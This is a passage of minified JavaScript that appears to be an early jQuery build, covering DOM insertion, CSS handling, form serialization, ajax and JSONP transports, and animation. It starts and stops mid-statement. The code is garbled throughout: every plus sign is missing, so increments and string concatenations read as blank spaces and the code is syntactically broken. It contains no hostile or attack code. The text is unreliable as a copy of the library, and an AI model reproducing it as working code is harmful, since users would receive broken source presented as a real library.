multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:st.support.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},an=p(V),sn=an.appendChild(V.createElement("div"));on.optgroup=on.option,on.tbody=on.tfoot=on.colgroup=on.caption=on.thead,on.th=on.td,st.fn.extend({text:function(e){return st.access(this,function(e){return e===t?st.text(this):this.empty().append((this[0]&&this[0].ownerDocument||V).createTextNode(e))},null,e,arguments.length)},wrapAll:function(e){if(st.isFunction(e))return this.each(function(t){st(this).wrapAll(e.call(this,t))});if(this[0]){var t=st(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){for(var e=this;e.firstChild&&1===e.firstChild.nodeType;)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return st.isFunction(e)?this.each(function(t){st(this).wrapInner(e.call(this,t))}):this.each(function(){var t=st(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=st.isFunction(e);return this.each(function(n){st(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){st.nodeName(this,"body")||st(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,!0,function(e){(1===this.nodeType||11===this.nodeType||9===this.nodeType)&&this.appendChild(e)})},prepend:function(){return this.domManip(arguments,!0,function(e){(1===this.nodeType||11===this.nodeType||9===this.nodeType)&&this.insertBefore(e,this.firstChild)})},before:function(){return this.domManip(arguments,!1,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return this.domManip(arguments,!1,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},remove:function(e,t){for(var n,r=0;null!=(n=this[r]);r  )(!e||st.filter(e,[n]).length>0)&&(t||1!==n.nodeType||st.cleanData(b(n)),n.parentNode&&(t&&st.contains(n.ownerDocument,n)&&m(b(n,"script")),n.parentNode.removeChild(n)));return this},empty:function(){for(var e,t=0;null!=(e=this[t]);t  ){for(1===e.nodeType&&st.cleanData(b(e,!1));e.firstChild;)e.removeChild(e.firstChild);e.options&&st.nodeName(e,"select")&&(e.options.length=0)}return this},clone:function(e,t){return e=null==e?!1:e,t=null==t?e:t,this.map(function(){return st.clone(this,e,t)})},html:function(e){return st.access(this,function(e){var n=this[0]||{},r=0,i=this.length;if(e===t)return 1===n.nodeType?n.innerHTML.replace(Xt,""):t;if(!("string"!=typeof e||Kt.test(e)||!st.support.htmlSerialize&&Ut.test(e)||!st.support.leadingWhitespace&&Vt.test(e)||on[(Jt.exec(e)||["",""])[1].toLowerCase()])){e=e.replace(Yt,"<$1></$2>");try{for(;i>r;r  )n=this[r]||{},1===n.nodeType&&(st.cleanData(b(n,!1)),n.innerHTML=e);n=0}catch(o){}}n&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(e){var t=st.isFunction(e);return t||"string"==typeof e||(e=st(e).not(this).detach()),this.domManip([e],!0,function(e){var t=this.nextSibling,n=this.parentNode;(n&&1===this.nodeType||11===this.nodeType)&&(st(this).remove(),t?t.parentNode.insertBefore(e,t):n.appendChild(e))})},detach:function(e){return this.remove(e,!0)},domManip:function(e,n,r){e=et.apply([],e);var i,o,a,s,u,l,c=0,f=this.length,p=this,m=f-1,y=e[0],v=st.isFunction(y);if(v||!(1>=f||"string"!=typeof y||st.support.checkClone)&&en.test(y))return this.each(function(i){var o=p.eq(i);v&&(e[0]=y.call(this,i,n?o.html():t)),o.domManip(e,n,r)});if(f&&(i=st.buildFragment(e,this[0].ownerDocument,!1,this),o=i.firstChild,1===i.childNodes.length&&(i=o),o)){for(n=n&&st.nodeName(o,"tr"),a=st.map(b(i,"script"),h),s=a.length;f>c;c  )u=i,c!==m&&(u=st.clone(u,!0,!0),s&&st.merge(a,b(u,"script"))),r.call(n&&st.nodeName(this[c],"table")?d(this[c],"tbody"):this[c],u,c);if(s)for(l=a[a.length-1].ownerDocument,st.map(a,g),c=0;s>c;c  )u=a[c],tn.test(u.type||"")&&!st._data(u,"globalEval")&&st.contains(l,u)&&(u.src?st.ajax({url:u.src,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0}):st.globalEval((u.text||u.textContent||u.innerHTML||"").replace(rn,"")));i=o=null}return this}}),st.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){st.fn[e]=function(e){for(var n,r=0,i=[],o=st(e),a=o.length-1;a>=r;r  )n=r===a?this:this.clone(!0),st(o[r])[t](n),tt.apply(i,n.get());return this.pushStack(i)}}),st.extend({clone:function(e,t,n){var r,i,o,a,s,u=st.contains(e.ownerDocument,e);if(st.support.html5Clone||st.isXMLDoc(e)||!Ut.test("<" e.nodeName ">")?s=e.cloneNode(!0):(sn.innerHTML=e.outerHTML,sn.removeChild(s=sn.firstChild)),!(st.support.noCloneEvent&&st.support.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||st.isXMLDoc(e)))for(r=b(s),i=b(e),a=0;null!=(o=i[a]);  a)r[a]&&v(o,r[a]);if(t)if(n)for(i=i||b(e),r=r||b(s),a=0;null!=(o=i[a]);a  )y(o,r[a]);else y(e,s);return r=b(s,"script"),r.length>0&&m(r,!u&&b(e,"script")),r=i=o=null,s},buildFragment:function(e,t,n,r){for(var i,o,a,s,u,l,c,f=e.length,d=p(t),h=[],g=0;f>g;g  )if(o=e[g],o||0===o)if("object"===st.type(o))st.merge(h,o.nodeType?[o]:o);else if(Qt.test(o)){for(s=s||d.appendChild(t.createElement("div")),a=(Jt.exec(o)||["",""])[1].toLowerCase(),u=on[a]||on._default,s.innerHTML=u[1] o.replace(Yt,"<$1></$2>") u[2],c=u[0];c--;)s=s.lastChild;if(!st.support.leadingWhitespace&&Vt.test(o)&&h.push(t.createTextNode(Vt.exec(o)[0])),!st.support.tbody)for(o="table"!==a||Gt.test(o)?"<table>"!==u[1]||Gt.test(o)?0:s:s.firstChild,c=o&&o.childNodes.length;c--;)st.nodeName(l=o.childNodes[c],"tbody")&&!l.childNodes.length&&o.removeChild(l);for(st.merge(h,s.childNodes),s.textContent="";s.firstChild;)s.removeChild(s.firstChild);s=d.lastChild}else h.push(t.createTextNode(o));for(s&&d.removeChild(s),st.support.appendChecked||st.grep(b(h,"input"),x),g=0;o=h[g  ];)if((!r||-1===st.inArray(o,r))&&(i=st.contains(o.ownerDocument,o),s=b(d.appendChild(o),"script"),i&&m(s),n))for(c=0;o=s[c  ];)tn.test(o.type||"")&&n.push(o);return s=null,d},cleanData:function(e,n){for(var r,i,o,a,s=0,u=st.expando,l=st.cache,c=st.support.deleteExpando,f=st.event.special;null!=(o=e[s]);s  )if((n||st.acceptData(o))&&(i=o[u],r=i&&l[i])){if(r.events)for(a in r.events)f[a]?st.event.remove(o,a):st.removeEvent(o,a,r.handle);l[i]&&(delete l[i],c?delete o[u]:o.removeAttribute!==t?o.removeAttribute(u):o[u]=null,K.push(i))}}});var un,ln,cn,fn=/alpha\([^)]*\)/i,pn=/opacity\s*=\s*([^)]*)/,dn=/^(top|right|bottom|left)$/,hn=/^(none|table(?!-c[ea]). )/,gn=/^margin/,mn=RegExp("^(" ut ")(.*)$","i"),yn=RegExp("^(" ut ")(?!px)[a-z%] $","i"),vn=RegExp("^([ -])=(" ut ")","i"),bn={BODY:"block"},xn={position:"absolute",visibility:"hidden",display:"block"},Tn={letterSpacing:0,fontWeight:400},wn=["Top","Right","Bottom","Left"],Nn=["Webkit","O","Moz","ms"];st.fn.extend({css:function(e,n){return st.access(this,function(e,n,r){var i,o,a={},s=0;if(st.isArray(n)){for(i=ln(e),o=n.length;o>s;s  )a[n[s]]=st.css(e,n[s],!1,i);return a}return r!==t?st.style(e,n,r):st.css(e,n)},e,n,arguments.length>1)},show:function(){return N(this,!0)},hide:function(){return N(this)},toggle:function(e){var t="boolean"==typeof e;return this.each(function(){(t?e:w(this))?st(this).show():st(this).hide()})}}),st.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=un(e,"opacity");return""===n?"1":n}}}},cssNumber:{columnCount:!0,fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":st.support.cssFloat?"cssFloat":"styleFloat"},style:function(e,n,r,i){if(e&&3!==e.nodeType&&8!==e.nodeType&&e.style){var o,a,s,u=st.camelCase(n),l=e.style;if(n=st.cssProps[u]||(st.cssProps[u]=T(l,u)),s=st.cssHooks[n]||st.cssHooks[u],r===t)return s&&"get"in s&&(o=s.get(e,!1,i))!==t?o:l[n];if(a=typeof r,"string"===a&&(o=vn.exec(r))&&(r=(o[1] 1)*o[2] parseFloat(st.css(e,n)),a="number"),!(null==r||"number"===a&&isNaN(r)||("number"!==a||st.cssNumber[u]||(r ="px"),st.support.clearCloneStyle||""!==r||0!==n.indexOf("background")||(l[n]="inherit"),s&&"set"in s&&(r=s.set(e,r,i))===t)))try{l[n]=r}catch(c){}}},css:function(e,n,r,i){var o,a,s,u=st.camelCase(n);return n=st.cssProps[u]||(st.cssProps[u]=T(e.style,u)),s=st.cssHooks[n]||st.cssHooks[u],s&&"get"in s&&(o=s.get(e,!0,r)),o===t&&(o=un(e,n,i)),"normal"===o&&n in Tn&&(o=Tn[n]),r?(a=parseFloat(o),r===!0||st.isNumeric(a)?a||0:o):o},swap:function(e,t,n,r){var i,o,a={};for(o in t)a[o]=e.style[o],e.style[o]=t[o];i=n.apply(e,r||[]);for(o in t)e.style[o]=a[o];return i}}),e.getComputedStyle?(ln=function(t){return e.getComputedStyle(t,null)},un=function(e,n,r){var i,o,a,s=r||ln(e),u=s?s.getPropertyValue(n)||s[n]:t,l=e.style;return s&&(""!==u||st.contains(e.ownerDocument,e)||(u=st.style(e,n)),yn.test(u)&&gn.test(n)&&(i=l.width,o=l.minWidth,a=l.maxWidth,l.minWidth=l.maxWidth=l.width=u,u=s.width,l.width=i,l.minWidth=o,l.maxWidth=a)),u}):V.documentElement.currentStyle&&(ln=function(e){return e.currentStyle},un=function(e,n,r){var i,o,a,s=r||ln(e),u=s?s[n]:t,l=e.style;return null==u&&l&&l[n]&&(u=l[n]),yn.test(u)&&!dn.test(n)&&(i=l.left,o=e.runtimeStyle,a=o&&o.left,a&&(o.left=e.currentStyle.left),l.left="fontSize"===n?"1em":u,u=l.pixelLeft "px",l.left=i,a&&(o.left=a)),""===u?"auto":u}),st.each(["height","width"],function(e,n){st.cssHooks[n]={get:function(e,r,i){return r?0===e.offsetWidth&&hn.test(st.css(e,"display"))?st.swap(e,xn,function(){return E(e,n,i)}):E(e,n,i):t},set:function(e,t,r){var i=r&&ln(e);return C(e,t,r?k(e,n,r,st.support.boxSizing&&"border-box"===st.css(e,"boxSizing",!1,i),i):0)}}}),st.support.opacity||(st.cssHooks.opacity={get:function(e,t){return pn.test((t&&e.currentStyle?e.currentStyle.filter:e.style.filter)||"")?.01*parseFloat(RegExp.$1) "":t?"1":""},set:function(e,t){var n=e.style,r=e.currentStyle,i=st.isNumeric(t)?"alpha(opacity=" 100*t ")":"",o=r&&r.filter||n.filter||"";n.zoom=1,(t>=1||""===t)&&""===st.trim(o.replace(fn,""))&&n.removeAttribute&&(n.removeAttribute("filter"),""===t||r&&!r.filter)||(n.filter=fn.test(o)?o.replace(fn,i):o " " i)}}),st(function(){st.support.reliableMarginRight||(st.cssHooks.marginRight={get:function(e,n){return n?st.swap(e,{display:"inline-block"},un,[e,"marginRight"]):t}}),!st.support.pixelPosition&&st.fn.position&&st.each(["top","left"],function(e,n){st.cssHooks[n]={get:function(e,r){return r?(r=un(e,n),yn.test(r)?st(e).position()[n] "px":r):t}}})}),st.expr&&st.expr.filters&&(st.expr.filters.hidden=function(e){return 0===e.offsetWidth&&0===e.offsetHeight||!st.support.reliableHiddenOffsets&&"none"===(e.style&&e.style.display||st.css(e,"display"))},st.expr.filters.visible=function(e){return!st.expr.filters.hidden(e)}),st.each({margin:"",padding:"",border:"Width"},function(e,t){st.cssHooks[e t]={expand:function(n){for(var r=0,i={},o="string"==typeof n?n.split(" "):[n];4>r;r  )i[e wn[r] t]=o[r]||o[r-2]||o[0];return i}},gn.test(e)||(st.cssHooks[e t].set=C)});var Cn=/ /g,kn=/\[\]$/,En=/\r?\n/g,Sn=/^(?:submit|button|image|reset)$/i,An=/^(?:input|select|textarea|keygen)/i;st.fn.extend({serialize:function(){return st.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var e=st.prop(this,"elements");return e?st.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!st(this).is(":disabled")&&An.test(this.nodeName)&&!Sn.test(e)&&(this.checked||!Zt.test(e))}).map(function(e,t){var n=st(this).val();return null==n?null:st.isArray(n)?st.map(n,function(e){return{name:t.name,value:e.replace(En,"\r\n")}}):{name:t.name,value:n.replace(En,"\r\n")}}).get()}}),st.param=function(e,n){var r,i=[],o=function(e,t){t=st.isFunction(t)?t():null==t?"":t,i[i.length]=encodeURIComponent(e) "=" encodeURIComponent(t)};if(n===t&&(n=st.ajaxSettings&&st.ajaxSettings.traditional),st.isArray(e)||e.jquery&&!st.isPlainObject(e))st.each(e,function(){o(this.name,this.value)});else for(r in e)j(r,e[r],n,o);return i.join("&").replace(Cn," ")};var jn,Dn,Ln=st.now(),Hn=/\?/,Mn=/#.*$/,qn=/([?&])_=[^&]*/,_n=/^(.*?):[ \t]*([^\r\n]*)\r?$/gm,Fn=/^(?:about|app|app-storage|. -extension|file|res|widget):$/,On=/^(?:GET|HEAD)$/,Bn=/^\/\//,Pn=/^([\w. -] :)(?:\/\/([^\/?#:]*)(?::(\d )|)|)/,Rn=st.fn.load,Wn={},$n={},In="*/".concat("*");try{Dn=Y.href}catch(zn){Dn=V.createElement("a"),Dn.href="",Dn=Dn.href}jn=Pn.exec(Dn.toLowerCase())||[],st.fn.load=function(e,n,r){if("string"!=typeof e&&Rn)return Rn.apply(this,arguments);var i,o,a,s=this,u=e.indexOf(" ");return u>=0&&(i=e.slice(u,e.length),e=e.slice(0,u)),st.isFunction(n)?(r=n,n=t):n&&"object"==typeof n&&(o="POST"),s.length>0&&st.ajax({url:e,type:o,dataType:"html",data:n}).done(function(e){a=arguments,s.html(i?st("<div>").append(st.parseHTML(e)).find(i):e)}).complete(r&&function(e,t){s.each(r,a||[e.responseText,t,e])}),this},st.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){st.fn[t]=function(e){return this.on(t,e)}}),st.each(["get","post"],function(e,n){st[n]=function(e,r,i,o){return st.isFunction(r)&&(o=o||i,i=r,r=t),st.ajax({url:e,type:n,dataType:o,data:r,success:i})}}),st.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:Dn,type:"GET",isLocal:Fn.test(jn[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":In,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText"},converters:{"* text":e.String,"text html":!0,"text json":st.parseJSON,"text xml":st.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(e,t){return t?H(H(e,st.ajaxSettings),t):H(st.ajaxSettings,e)},ajaxPrefilter:D(Wn),ajaxTransport:D($n),ajax:function(e,n){function r(e,n,r,s){var l,f,v,b,T,N=n;2!==x&&(x=2,u&&clearTimeout(u),i=t,a=s||"",w.readyState=e>0?4:0,r&&(b=M(p,w,r)),e>=200&&300>e||304===e?(p.ifModified&&(T=w.getResponseHeader("Last-Modified"),T&&(st.lastModified[o]=T),T=w.getResponseHeader("etag"),T&&(st.etag[o]=T)),304===e?(l=!0,N="notmodified"):(l=q(p,b),N=l.state,f=l.data,v=l.error,l=!v)):(v=N,(e||!N)&&(N="error",0>e&&(e=0))),w.status=e,w.statusText=(n||N) "",l?g.resolveWith(d,[f,N,w]):g.rejectWith(d,[w,N,v]),w.statusCode(y),y=t,c&&h.trigger(l?"ajaxSuccess":"ajaxError",[w,p,l?f:v]),m.fireWith(d,[w,N]),c&&(h.trigger("ajaxComplete",[w,p]),--st.active||st.event.trigger("ajaxStop")))}"object"==typeof e&&(n=e,e=t),n=n||{};var i,o,a,s,u,l,c,f,p=st.ajaxSetup({},n),d=p.context||p,h=p.context&&(d.nodeType||d.jquery)?st(d):st.event,g=st.Deferred(),m=st.Callbacks("once memory"),y=p.statusCode||{},v={},b={},x=0,T="canceled",w={readyState:0,getResponseHeader:function(e){var t;if(2===x){if(!s)for(s={};t=_n.exec(a);)s[t[1].toLowerCase()]=t[2];t=s[e.toLowerCase()]}return null==t?null:t},getAllResponseHeaders:function(){return 2===x?a:null},setRequestHeader:function(e,t){var n=e.toLowerCase();return x||(e=b[n]=b[n]||e,v[e]=t),this},overrideMimeType:function(e){return x||(p.mimeType=e),this},statusCode:function(e){var t;if(e)if(2>x)for(t in e)y[t]=[y[t],e[t]];else w.always(e[w.status]);return this},abort:function(e){var t=e||T;return i&&i.abort(t),r(0,t),this}};if(g.promise(w).complete=m.add,w.success=w.done,w.error=w.fail,p.url=((e||p.url||Dn) "").replace(Mn,"").replace(Bn,jn[1] "//"),p.type=n.method||n.type||p.method||p.type,p.dataTypes=st.trim(p.dataType||"*").toLowerCase().match(lt)||[""],null==p.crossDomain&&(l=Pn.exec(p.url.toLowerCase()),p.crossDomain=!(!l||l[1]===jn[1]&&l[2]===jn[2]&&(l[3]||("http:"===l[1]?80:443))==(jn[3]||("http:"===jn[1]?80:443)))),p.data&&p.processData&&"string"!=typeof p.data&&(p.data=st.param(p.data,p.traditional)),L(Wn,p,n,w),2===x)return w;c=p.global,c&&0===st.active  &&st.event.trigger("ajaxStart"),p.type=p.type.toUpperCase(),p.hasContent=!On.test(p.type),o=p.url,p.hasContent||(p.data&&(o=p.url =(Hn.test(o)?"&":"?") p.data,delete p.data),p.cache===!1&&(p.url=qn.test(o)?o.replace(qn,"$1_=" Ln  ):o (Hn.test(o)?"&":"?") "_=" Ln  )),p.ifModified&&(st.lastModified[o]&&w.setRequestHeader("If-Modified-Since",st.lastModified[o]),st.etag[o]&&w.setRequestHeader("If-None-Match",st.etag[o])),(p.data&&p.hasContent&&p.contentType!==!1||n.contentType)&&w.setRequestHeader("Content-Type",p.contentType),w.setRequestHeader("Accept",p.dataTypes[0]&&p.accepts[p.dataTypes[0]]?p.accepts[p.dataTypes[0]] ("*"!==p.dataTypes[0]?", " In "; q=0.01":""):p.accepts["*"]);for(f in p.headers)w.setRequestHeader(f,p.headers[f]);if(p.beforeSend&&(p.beforeSend.call(d,w,p)===!1||2===x))return w.abort();T="abort";for(f in{success:1,error:1,complete:1})w[f](p[f]);if(i=L($n,p,n,w)){w.readyState=1,c&&h.trigger("ajaxSend",[w,p]),p.async&&p.timeout>0&&(u=setTimeout(function(){w.abort("timeout")},p.timeout));try{x=1,i.send(v,r)}catch(N){if(!(2>x))throw N;r(-1,N)}}else r(-1,"No Transport");return w},getScript:function(e,n){return st.get(e,t,n,"script")},getJSON:function(e,t,n){return st.get(e,t,n,"json")}}),st.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(e){return st.globalEval(e),e}}}),st.ajaxPrefilter("script",function(e){e.cache===t&&(e.cache=!1),e.crossDomain&&(e.type="GET",e.global=!1)}),st.ajaxTransport("script",function(e){if(e.crossDomain){var n,r=V.head||st("head")[0]||V.documentElement;return{send:function(t,i){n=V.createElement("script"),n.async=!0,e.scriptCharset&&(n.charset=e.scriptCharset),n.src=e.url,n.onload=n.onreadystatechange=function(e,t){(t||!n.readyState||/loaded|complete/.test(n.readyState))&&(n.onload=n.onreadystatechange=null,n.parentNode&&n.parentNode.removeChild(n),n=null,t||i(200,"success"))},r.insertBefore(n,r.firstChild)},abort:function(){n&&n.onload(t,!0)}}}});var Xn=[],Un=/(=)\?(?=&|$)|\?\?/;st.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Xn.pop()||st.expando "_" Ln  ;return this[e]=!0,e}}),st.ajaxPrefilter("json jsonp",function(n,r,i){var o,a,s,u=n.jsonp!==!1&&(Un.test(n.url)?"url":"string"==typeof n.data&&!(n.contentType||"").indexOf("application/x-www-form-urlencoded")&&Un.test(n.data)&&"data");return u||"jsonp"===n.dataTypes[0]?(o=n.jsonpCallback=st.isFunction(n.jsonpCallback)?n.jsonpCallback():n.jsonpCallback,u?n[u]=n[u].replace(Un,"$1" o):n.jsonp!==!1&&(n.url =(Hn.test(n.url)?"&":"?") n.jsonp "=" o),n.converters["script json"]=function(){return s||st.error(o " was not called"),s[0]},n.dataTypes[0]="json",a=e[o],e[o]=function(){s=arguments},i.always(function(){e[o]=a,n[o]&&(n.jsonpCallback=r.jsonpCallback,Xn.push(o)),s&&st.isFunction(a)&&a(s[0]),s=a=t}),"script"):t});var Vn,Yn,Jn=0,Gn=e.ActiveXObject&&function(){var e;for(e in Vn)Vn[e](t,!0)};st.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&_()||F()}:_,Yn=st.ajaxSettings.xhr(),st.support.cors=!!Yn&&"withCredentials"in Yn,Yn=st.support.ajax=!!Yn,Yn&&st.ajaxTransport(function(n){if(!n.crossDomain||st.support.cors){var r;return{send:function(i,o){var a,s,u=n.xhr();if(n.username?u.open(n.type,n.url,n.async,n.username,n.password):u.open(n.type,n.url,n.async),n.xhrFields)for(s in n.xhrFields)u[s]=n.xhrFields[s];n.mimeType&&u.overrideMimeType&&u.overrideMimeType(n.mimeType),n.crossDomain||i["X-Requested-With"]||(i["X-Requested-With"]="XMLHttpRequest");try{for(s in i)u.setRequestHeader(s,i[s])}catch(l){}u.send(n.hasContent&&n.data||null),r=function(e,i){var s,l,c,f,p;try{if(r&&(i||4===u.readyState))if(r=t,a&&(u.onreadystatechange=st.noop,Gn&&delete Vn[a]),i)4!==u.readyState&&u.abort();else{f={},s=u.status,p=u.responseXML,c=u.getAllResponseHeaders(),p&&p.documentElement&&(f.xml=p),"string"==typeof u.responseText&&(f.text=u.responseText);try{l=u.statusText}catch(d){l=""}s||!n.isLocal||n.crossDomain?1223===s&&(s=204):s=f.text?200:404}}catch(h){i||o(-1,h)}f&&o(s,l,f,c)},n.async?4===u.readyState?setTimeout(r):(a=  Jn,Gn&&(Vn||(Vn={},st(e).unload(Gn)),Vn[a]=r),u.onreadystatechange=r):r()},abort:function(){r&&r(t,!0)}}}});var Qn,Kn,Zn=/^(?:toggle|show|hide)$/,er=RegExp("^(?:([ -])=|)(" ut ")([a-z%]*)$","i"),tr=/queueHooks$/,nr=[W],rr={"*":[function(e,t){var n,r,i=this.createTween(e,t),o=er.exec(t),a=i.cur(),s= a||0,u=1,l=20;if(o){if(n= o[2],r=o[3]||(st.cssNumber[e]?"":"px"),"px"!==r&&s){s=st.css(i.elem,e,!0)||n||1;do u=u||".5",s/=u,st.style(i.elem,e,s r);while(u!==(u=i.cur()/a)&&1!==u&&--l)}i.unit=r,i.start=s,i.end=o[1]?s (o[1] 1)*n:n}return i}]};st.Animation=st.extend(P,{tweener:function(e,t){st.isFunction(e)?(t=e,e=["*"]):e=e.split(" ");for(var n,r=0,i=e.length;i>r;r  )n=e[r],rr[n]=rr[n]||[],rr[n].unshift(t)},prefilter:function(e,t){t?nr.unshift(e):nr.push(e)}}),st.Tween=$,$.prototype={constructor:$,init:function(e,t,n,r,i,o){this.elem=e,this.prop=n,this.easing=i||"swing",this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=o||(st.cssNumber[n]?"":"px")},cur:function(){var e=$.propHooks[this.prop];return e&&e.get?e.get(this):$.propHooks._default.get(this)},run:function(e){var t,n=$.propHooks[this.prop];return this.pos=t=this.options.duration?st.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):e,this.now=(this.end-this.start)*t this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):$.propHooks._default.set(this),this}},$.prototype.init.prototype=$.prototype,$.propHooks={_default:{get:function(e){var t;return null==e.elem[e.prop]||e.elem.style&&null!=e.elem.style[e.prop]?(t=st.css(e.elem,e.prop,"auto"),t&&"auto"!==t?t:0):e.elem[e.prop]},set:function(e){st.fx.step[e.prop]?st.fx.step[e.prop](e):e.elem.style&&(null!=e.elem.style[st.cssProps[e.prop]]||st.cssHooks[e.prop])?st.style(e.elem,e.prop,e.now e.unit):e.elem[e.prop]=e.now}}},$.propHooks.scrollTop=$.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},st.each(["toggle","show","hide"],function(e,t){var n=st.fn[t];st.fn[t]=function(e,r,i){return null==e||"boolean"==typeof e?n.apply(this,arguments):this.animate(I(t,!0),e,r,i)}}),st.fn.extend({fadeTo:function(e,t,n,r){return this.filter(w).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=st.isEmptyObject(e),o=st.speed(t,n,r),a=function(){var t=P(this,st.extend({},e),o);a.finish=function(){t.stop(!0)},(i||st._data(this,"finish"))&&t.stop(!0)};return a.finish=a,i||o.queue===!1?this.each(a):this.queue(o.queue,a)},stop:function(e,n,r){var i=function(e){var t=e.stop;delete e.stop,t(r)};return"string"!=typeof e&&(r=n,n=e,e=t),n&&e!==!1&&this.queue(e||"fx",[]),this.each(function(){var t=!0,n=null!=e&&e "queueHooks",o=st.timers,a=st._data(this);if(n)a[n]&&a[n].stop&&i(a[n]);else for(n in a)a[n]&&a[n].stop&&tr.test(n)&&i(a[n]);for(n=o.length;n--;)o[n].elem!==this||null!=e&&o[n].queue!==e||(o[n].anim.stop(r),t=!1,o.splice(n,1));(t||!r)&&st.dequeue(this,e)})},finish:function(e){return e!==!1&&(e=e||"fx"),this.each(function(){var t,n=st._data(this),r=n[e "queue"],i=n[e "queueHooks"],o=st.timers,a=r?r.length:0;for(n.finish=!0,st.queue(this,e,[]),i&&i.cur&&i.cur.finish&&i.cur.finish.call(this),t=o.length;t--;)o[t].elem===this&&o[t].queue===e&&(o[t].anim.stop(!0),o.splice(t,1));for(t=0;a>t;t  )r[t]&&r[t].finish&&r[t].finish.call(this);delete n.finish})}}),st.each({slideDown:I("show"),slideUp:I("hide"),slideToggle:I("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){st.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),st.speed=function(e,t,n){var r=e&&"object"==typeof e?st.extend({},e):{complete:n||!n&&t||st.isFunction(e)&&e,duration:e,easing:n&&t||t&&!st.isFunction(t)&&t};return r.duration=st.fx.off?0:"number"==typeof r.duration?r.duration:r.duration in st.fx.speeds?st.fx.speeds[r.duration]:st.fx.speeds._default,(null==r.queue||r.queue===!0)&&(r.queue="fx"),r.old=r.complete,r.complete=function(){st.isFunction(r.old)&&r.old.call(this),r.queue&&st.dequeue(this,r.queue)},r},st.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2}},st.timers=[],st.fx=$.prototype.init,st.fx.tick=function(){var e,n=st.timers,r=0;for(Qn=st.now();n.length>r;r  )e=n[r],e()||n[r]!==e||n.splice(r--,1);n.length||st.fx.stop(),Qn=t},st.fx.timer=function(e){e()&&st.timers.push(e)&&st.fx.start()},st.fx.interval=13,st.fx.start=function(){Kn||(Kn=setInterval(st.fx.tick,st.fx.interval))},st.fx.stop=function(){clearInterval(Kn),Kn=null},st.fx.speeds={slow:600,fast:200,_default:400},st.fx.step={},st.expr&&st.expr.filters&&(st.expr.filters.animated=function(e){return st.grep(st.timers,function(t){return e===t.elem}).length}),st.fn.offset=function(e){if(arguments.length)return e===t?this:this.each(function(t){st.offset.setOffset(this,e,t)});var n,r,i={top:0,left:0},o=this[0],a=o&&o.ownerDocument;if(a)return n=a.documentElement,st.contains(n,o)?(o.getBoundingClientRect!==t&&(i=o.getBoundingClientRect()),r=z(a),{top:i.top (r.pageYOffset||n.scrollTop)-(n.clientTop||0),left:i.left (r.pageXOffset||n.scrollLeft)-(n.clientLeft||0)}):i},st.offset={setOffset:function(e,t,n){var r=st.css(e,"position");"static"===r&&(e.style.position="relative");var i,o,a=st(e),s=a.offset(),u=st.css(e,"top"),l=st.css(e,"left"),c=("absolute"===r||"fixed"===r)&&st.inArray("auto",[u,l])>-1,f={},p={};c?(p=a.position(),i=p.top,o=p.left):(i=parseFloat(u)||0,o=parseFloat(l)||0),st.isFunction(t)&&(t=t.call(e,n,s)),null!=t.top&&(f.top=t.top-s.top i),null!=t.left&&(f.left=t.left-s.left o),"using"in t?t.using.call(e,f):a.css(f)}},st.fn.extend({position:function(){if(this[0]){var e,t,n={top:0,left:0},r=this[0];return"fixed"===st.css(r,"position")?t=r.getBoundingClientRect():(e=this.offsetParent(),t=this.offset(),st.nodeName(e[0],"html")||(n=e.offset()),n.top =st.css(e[0],"borderTopWidth",!0),n.left =st.css(e[0],"borderLeftWidth",!0)),{top:t.top-n.top-st.css(r,"marginTop",!0),left:t.left-n.left-st.css(r,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){for(var e=this.offsetParent||V.documentElement;e&&!st.nodeName(e,"html")&&"static"===st.css(e,"position");)e=e.offsetParent;return e||V.documentElement})}}),st.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,n){var r=/Y/.test(n);st.fn[e]=function(i){return 